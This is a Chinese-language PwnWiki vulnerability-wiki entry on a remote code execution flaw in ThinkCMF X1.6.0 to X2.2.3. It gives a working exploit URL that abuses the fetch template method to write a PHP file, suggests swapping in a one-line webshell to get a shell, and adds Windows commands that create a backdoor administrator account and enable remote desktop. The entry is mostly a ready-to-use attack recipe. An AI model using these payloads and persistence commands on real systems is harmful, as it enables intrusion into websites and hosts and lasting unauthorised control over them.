PWNWIK.COM
,
ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞
影响版本:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
漏洞利用:
使用a参数的fetch方法,实现远程代码执行
?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
访问:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
访问:
http://127.0.0.1/cmfx/test.php
即可显示PHPINFO信息。
修改Payload为一句话木马即可Getshell。
新建用户并添加到管理员组,开启远程桌面连接(对于Windows):
net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
thinkcmf批量利用工具
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库